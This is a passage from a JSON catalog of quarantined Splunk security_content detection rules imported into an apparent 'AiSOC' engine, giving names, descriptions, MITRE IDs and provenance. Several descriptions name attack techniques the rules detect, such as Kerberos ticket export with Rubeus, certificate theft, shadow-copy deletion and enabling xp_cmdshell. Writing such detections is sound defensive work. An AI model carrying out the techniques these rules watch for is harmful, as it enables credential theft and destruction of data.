Monitoring this behavior is crucial because stolen certificates can be used to impersonate users, decrypt sensitive data, or facilitate further attacks. 
If confirmed malicious, this activity could lead to unauthorized access to encrypted communications and sensitive information, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.004", "T1649" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-export-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e38ded4-c964-41f4-8cb6-4a1a53c6929f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_export_certificate.yml" } }, { "id": "splunk-security-content-5e3f6b44-42cb-4f8a-99f0-59e78a52ea1d", "type": "detection", "name": "Cisco NVM - Installation of Typosquatted Python Package", "description": "This analytic detects suspicious Python package installations where the package name resembles popular Python libraries but may be typosquatted or slightly altered.\nTyposquatting is a common technique used by attackers to trick users into installing malicious packages that mimic legitimate ones.\nThis detection leverages Cisco NVM flow telemetry and checks for pip or poetry package managers with the \"install\" or \"add\" flags, making outbound connections to package repositories such as `pypi.org` with known or suspected typo package names.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", 
"tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-installation-of-typosquatted-python-package.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5e3f6b44-42cb-4f8a-99f0-59e78a52ea1d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___installation_of_typosquatted_python_package.yml" } }, { "id": "splunk-security-content-5eb479b1-a5ea-4e01-8365-780078613776", "type": "detection", "name": "Windows Modify Registry Risk Behavior", "description": "The following analytic identifies instances where three or more distinct registry modification events associated with MITRE ATT&CK Technique T1112 are detected. It leverages data from the Risk data model in Splunk, focusing on registry-related sources and MITRE technique annotations. This activity is significant because multiple registry modifications can indicate an attempt to persist, hide malicious configurations, or erase forensic evidence. 
If confirmed malicious, this behavior could allow attackers to maintain persistent access, execute malicious code, and evade detection, posing a severe threat to the integrity and security of the affected host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-risk-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb479b1-a5ea-4e01-8365-780078613776", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_risk_behavior.yml" } }, { "id": "splunk-security-content-5eb76fe2-a869-4865-8c4c-8cff424b18a1", "type": "detection", "name": "Windows PowerShell Invoke-Sqlcmd Execution", "description": "This detection identifies potentially suspicious usage of the Invoke-Sqlcmd PowerShell cmdlet, which can be used for database operations and potential data exfiltration. The detection looks for suspicious parameter combinations and query patterns that may indicate unauthorized database access, data theft, or malicious database operations. 
Threat actors may prefer using PowerShell Invoke-Sqlcmd over sqlcmd.exe as it provides a more flexible programmatic interface and can better evade detection.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-invoke-sqlcmd-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb76fe2-a869-4865-8c4c-8cff424b18a1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_invoke_sqlcmd_execution.yml" } }, { "id": "splunk-security-content-5eb76fe2-a869-4865-8c4c-8cff424b18b1", "type": "detection", "name": "Windows SQL Server xp_cmdshell Config Change", "description": "This detection identifies when the xp_cmdshell configuration is modified in SQL Server. 
The xp_cmdshell extended stored procedure allows execution of operating system commands and programs from SQL Server, making it a high-risk feature commonly abused by attackers for privilege escalation and lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-sql-server-xp-cmdshell-config-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5eb76fe2-a869-4865-8c4c-8cff424b18b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_sql_server_xp_cmdshell_config_change.yml" } }, { "id": "splunk-security-content-5ed8c50a-8869-11ec-876f-acde48001122", "type": "detection", "name": "Rubeus Kerberos Ticket Exports Through Winlogon Access", "description": "The following analytic detects a process accessing the winlogon.exe system process, indicative of the Rubeus tool attempting to export Kerberos tickets from memory. This detection leverages Sysmon EventCode 10 logs, focusing on processes obtaining a handle to winlogon.exe with specific access rights. This activity is significant as it often precedes pass-the-ticket attacks, where adversaries use stolen Kerberos tickets to move laterally within an environment. 
If confirmed malicious, this could allow attackers to bypass normal access controls, escalate privileges, and persist within the network, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1550.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/rubeus-kerberos-ticket-exports-through-winlogon-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ed8c50a-8869-11ec-876f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/rubeus_kerberos_ticket_exports_through_winlogon_access.yml" } }, { "id": "splunk-security-content-5ee2bcd0-b2ff-11eb-bb34-acde48001122", "type": "detection", "name": "Delete ShadowCopy With PowerShell", "description": "The following analytic detects the use of PowerShell to delete shadow copies via the WMIC PowerShell module. It leverages EventCode 4104 and searches for specific keywords like \"ShadowCopy,\" \"Delete,\" or \"Remove\" within the ScriptBlockText. This activity is significant because deleting shadow copies is a common tactic used by ransomware, such as DarkSide, to prevent data recovery. 
If confirmed malicious, this action could lead to irreversible data loss and hinder recovery efforts, significantly impacting business continuity and data integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/delete-shadowcopy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ee2bcd0-b2ff-11eb-bb34-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/delete_shadowcopy_with_powershell.yml" } }, { "id": "splunk-security-content-5ee98b2f-8b9e-457a-8bdc-dd41aaba9e87", "type": "detection", "name": "Windows Registry Certificate Added", "description": "The following analytic detects the installation of a root CA certificate by monitoring specific registry paths for SetValue events. It leverages data from the Endpoint datamodel, focusing on registry paths containing \"certificates\" and registry values named \"Blob.\" This activity is significant because unauthorized root CA certificates can compromise the integrity of encrypted communications and facilitate man-in-the-middle attacks. 
If confirmed malicious, this could allow an attacker to intercept, decrypt, or manipulate sensitive data, leading to severe security breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-registry-certificate-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ee98b2f-8b9e-457a-8bdc-dd41aaba9e87", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_registry_certificate_added.yml" } }, { "id": "splunk-security-content-5f1d2ea7-eec0-4790-8b24-6875312ad492", "type": "detection", "name": "Linux Auditd File Permission Modification Via Chmod", "description": "The following analytic detects suspicious file permission modifications using the `chmod` command, which may indicate an attacker attempting to alter access controls on critical files or directories. Such modifications can be used to grant unauthorized users elevated privileges or to conceal malicious activities by restricting legitimate access. 
By monitoring for unusual or unauthorized `chmod` usage, this analytic helps identify potential security breaches, allowing security teams to respond promptly to prevent privilege escalation, data tampering, or other unauthorized actions on the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-file-permission-modification-via-chmod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f1d2ea7-eec0-4790-8b24-6875312ad492", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_file_permission_modification_via_chmod.yml" } }, { "id": "splunk-security-content-5f661629-9750-4cb9-897c-1f05d6db8727", "type": "detection", "name": "Okta Unauthorized Access to Application", "description": "The following analytic identifies attempts by users to access Okta applications that have not been assigned to them. It leverages Okta Identity Management logs, specifically focusing on failed access attempts to unassigned applications. This activity is significant for a SOC as it may indicate potential unauthorized access attempts, which could lead to exposure of sensitive information or disruption of services. 
If confirmed malicious, such activity could result in data breaches, non-compliance with data protection laws, and overall compromise of the IT environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-unauthorized-access-to-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f661629-9750-4cb9-897c-1f05d6db8727", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_unauthorized_access_to_application.yml" } }, { "id": "splunk-security-content-5f694cc4-a678-4a60-9410-bffca1b647dc", "type": "detection", "name": "O365 PST export alert", "description": "The following analytic detects instances where a user has initiated an eDiscovery search or exported a PST file in an Office 365 environment. It leverages Office 365 management activity logs, specifically filtering for events under ThreatManagement with the name \"eDiscovery search started or exported.\" This activity is significant as it may indicate data exfiltration attempts or unauthorized access to sensitive information. If confirmed malicious, it suggests an attacker or insider threat is attempting to gather or exfiltrate data, potentially leading to data breaches, loss of intellectual property, or unauthorized access to confidential communications. 
Immediate investigation is required.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-pst-export-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f694cc4-a678-4a60-9410-bffca1b647dc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_pst_export_alert.yml" } }, { "id": "splunk-security-content-5f7d8c3e-9a2b-4d6f-8e1c-3b5a9d7f2c4e", "type": "detection", "name": "Cisco ASA - User Privilege Level Change", "description": "This analytic detects privilege level changes for user accounts on Cisco ASA devices via CLI or ASDM.\nAdversaries may escalate account privileges to gain elevated access to network infrastructure, enable additional command execution capabilities, or establish higher-level persistent access. 
Privilege levels on Cisco ASA range from 0 (lowest) to 15 (full administrative access), with level 15 providing complete device control.\nThe detection monitors for ASA message ID 502103, which is generated whenever a user account's privilege level is modified, capturing both the old and new privilege levels along with the username and administrator who made the change.\nInvestigate unexpected privilege changes, especially escalations to level 15, substantial privilege increases (e.g., from level 1 to 15), changes performed outside business hours, changes by non-administrative users, or changes without corresponding change management tickets.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003", "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-user-privilege-level-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f7d8c3e-9a2b-4d6f-8e1c-3b5a9d7f2c4e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___user_privilege_level_change.yml" } }, { "id": "splunk-security-content-5f8671b6-07a7-425d-b3da-c39a53f2a6ae", "type": "detection", "name": "Windows RDP Bitmap Cache File Creation", "description": "This detection identifies the creation of Remote Desktop Protocol (RDP) bitmap cache files on a Windows system, typically located in the user\u2019s profile under the Terminal Server Client cache directory. 
These files (*.bmc, cache*.bin) are generated when a user initiates an RDP session using the built-in mstsc.exe client. Their presence can indicate interactive remote access activity and may be useful in detecting lateral movement or unauthorized RDP usage. Monitoring this behavior is especially important, as attackers may attempt to delete or suppress these artifacts to evade forensic analysis.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-rdp-bitmap-cache-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5f8671b6-07a7-425d-b3da-c39a53f2a6ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_rdp_bitmap_cache_file_creation.yml" } }, { "id": "splunk-security-content-5fde0b7c-df7a-40b1-9b3a-294c00f0289d", "type": "detection", "name": "Windows AD Same Domain SID History Addition", "description": "The following analytic detects changes to the sIDHistory attribute of user or computer objects within the same domain. It leverages Windows Security Event Codes 4738 and 4742 to identify when the sIDHistory attribute is modified. This activity is significant because the sIDHistory attribute can be abused by adversaries to grant unauthorized access by inheriting permissions from another account. 
If confirmed malicious, this could allow attackers to maintain persistent access or escalate privileges within the domain, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-same-domain-sid-history-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5fde0b7c-df7a-40b1-9b3a-294c00f0289d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_same_domain_sid_history_addition.yml" } }, { "id": "splunk-security-content-5ffaa42c-acdb-11eb-9ad3-acde48001122", "type": "detection", "name": "Process Kill Base On File Path", "description": "The following analytic detects the use of `wmic.exe` with the `delete` command to remove an executable path. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, parent processes, and command-line executions. This activity is significant because it often indicates the initial stages of an adversary setting up malicious activities, such as cryptocurrency mining, on an endpoint. 
If confirmed malicious, this behavior could allow an attacker to disable security tools or other critical processes, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/process-kill-base-on-file-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "5ffaa42c-acdb-11eb-9ad3-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/process_kill_base_on_file_path.yml" } }, { "id": "splunk-security-content-60023bb6-5500-11eb-ae93-0242ac130002", "type": "detection", "name": "Suspicious mshta child process", "description": "The following analytic identifies child processes spawned from \"mshta.exe\". It leverages data from Endpoint Detection and Response (EDR) agents, focusing on specific child processes like \"powershell.exe\" and \"cmd.exe\". This activity is significant because \"mshta.exe\" is often exploited by attackers to execute malicious scripts or commands. If confirmed malicious, this behavior could allow an attacker to execute arbitrary code, escalate privileges, or maintain persistence within the environment. 
Monitoring this activity helps in early detection of potential threats leveraging \"mshta.exe\" for malicious purposes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-mshta-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "60023bb6-5500-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_mshta_child_process.yml" } }, { "id": "splunk-security-content-603ebac2-f157-4df7-a6ac-34e8d0350f86", "type": "detection", "name": "O365 BEC Email Hiding Rule Created", "description": "This analytic detects mailbox rule creation, a common technique used in Business Email Compromise. It uses a scoring mechanism to identify a combination of attributes often featured in mailbox rules created by attackers. 
This may indicate that an attacker has gained access to the account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-bec-email-hiding-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "603ebac2-f157-4df7-a6ac-34e8d0350f86", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_bec_email_hiding_rule_created.yml" } }, { "id": "splunk-security-content-605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2", "type": "detection", "name": "O365 Threat Intelligence Suspicious Email Delivered", "description": "The following analytic identifies when a suspicious email is detected within the Microsoft Office 365 ecosystem through the Advanced Threat Protection engine and delivered to an end user. Attackers may execute several attacks through email, any detections from built-in Office 365 capabilities should be monitored and responded to appropriately. 
Certain premium Office 365 capabilities such as Safe Attachment and Safe Links further enhance these detection and response functions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-threat-intelligence-suspicious-email-delivered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "605cc93a-70e4-4ee3-9a3d-1a62e8c9b6c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_threat_intelligence_suspicious_email_delivered.yml" } }, { "id": "splunk-security-content-609ced68-d420-4ff7-8164-ae98b4b4018c", "type": "detection", "name": "ASL AWS IAM Delete Policy", "description": "The following analytic identifies when a policy is deleted in AWS. It leverages Amazon Security Lake logs to detect the DeletePolicy API operation. Monitoring policy deletions is crucial as it can indicate unauthorized attempts to weaken security controls. 
If confirmed malicious, this activity could allow an attacker to remove critical security policies, potentially leading to privilege escalation or unauthorized access to sensitive resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-delete-policy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "609ced68-d420-4ff7-8164-ae98b4b4018c", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_delete_policy.yml" } }, { "id": "splunk-security-content-60df805d-4605-41c8-bbba-57baa6a4eb97", "type": "detection", "name": "Windows Replication Through Removable Media", "description": "The following analytic detects the creation or dropping of executable or script files in the root directory of a removable drive. It leverages data from the Endpoint.Filesystem datamodel, focusing on specific file types and their creation paths. This activity is significant as it may indicate an attempt to spread malware, such as ransomware, via removable media. 
If confirmed malicious, this behavior could lead to unauthorized code execution, lateral movement, or persistence within the network, potentially compromising sensitive data and systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1091" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-replication-through-removable-media.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "60df805d-4605-41c8-bbba-57baa6a4eb97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_replication_through_removable_media.yml" } }, { "id": "splunk-security-content-61059783-574b-40d2-ac2f-69b898afd6b4", "type": "detection", "name": "Linux Auditd Doas Conf File Creation", "description": "The following analytic detects the creation of the doas.conf file on a Linux host.\nThis file is used by the doas utility to allow standard users to perform tasks as root, similar to sudo.\nThe detection leverages Linux Auditd data, focusing on the creation of the doas.conf file.\nThis activity is significant because it can indicate an attempt to gain elevated privileges, potentially by an adversary. 
If confirmed malicious, this could allow an attacker to execute commands with root privileges, leading to full system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-doas-conf-file-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61059783-574b-40d2-ac2f-69b898afd6b4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_doas_conf_file_creation.yml" } }, { "id": "splunk-security-content-61490da9-52a1-4855-a0c5-28233c88c481", "type": "detection", "name": "Windows Masquerading Explorer As Child Process", "description": "The following analytic identifies instances where explorer.exe is spawned by unusual parent processes such as cmd.exe, powershell.exe, or regsvr32.exe.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships.\nThis activity is significant because explorer.exe is typically initiated by userinit.exe, and deviations from this norm can indicate code injection or process masquerading attempts by malware like Qakbot.\nIf confirmed malicious, this behavior could allow attackers to execute arbitrary code, evade detection, and maintain persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, 
"playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-masquerading-explorer-as-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "61490da9-52a1-4855-a0c5-28233c88c481", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_masquerading_explorer_as_child_process.yml" } }, { "id": "splunk-security-content-6153c5ea-ed30-4878-81e6-21ecdb198189", "type": "detection", "name": "AWS Credential Access RDS Password reset", "description": "The following analytic detects the resetting of the master user password for an Amazon RDS DB instance. It leverages AWS CloudTrail logs to identify events where the `ModifyDBInstance` API call includes a new `masterUserPassword` parameter. This activity is significant because unauthorized password resets can grant attackers access to sensitive data stored in production databases, such as credit card information, PII, and healthcare data. If confirmed malicious, this could lead to data breaches, regulatory non-compliance, and significant reputational damage. 
Immediate investigation is required to determine the legitimacy of the password reset.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-credential-access-rds-password-reset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6153c5ea-ed30-4878-81e6-21ecdb198189", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_credential_access_rds_password_reset.yml" } }, { "id": "splunk-security-content-6169ea23-3719-439f-957a-0ea5174b70e2", "type": "detection", "name": "GitHub Enterprise Delete Branch Ruleset", "description": "The following analytic detects when branch rules are deleted in GitHub Enterprise. The detection monitors GitHub Enterprise audit logs for branch rule deletion events by tracking actor details, repository information, and associated metadata. For a SOC, identifying deleted branch rules is critical as it could indicate attempts to bypass code review requirements and security controls. Branch deletion rules are essential security controls that enforce code review, prevent force pushes, and maintain code quality. Disabling these protections could allow malicious actors to directly push unauthorized code changes or backdoors to protected branches. The impact of disabled branch protection includes potential code tampering, bypass of security reviews, introduction of vulnerabilities or malicious code, and compromise of software supply chain integrity. 
This activity could be part of a larger attack chain where an adversary first disables security controls before attempting to inject malicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-enterprise-delete-branch-ruleset.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6169ea23-3719-439f-957a-0ea5174b70e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_enterprise_delete_branch_ruleset.yml" } }, { "id": "splunk-security-content-61884b02-0dcf-44c5-9094-db33bac09fa6", "type": "detection", "name": "HTTP RMM User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of Remote Monitoring and Management applications. 
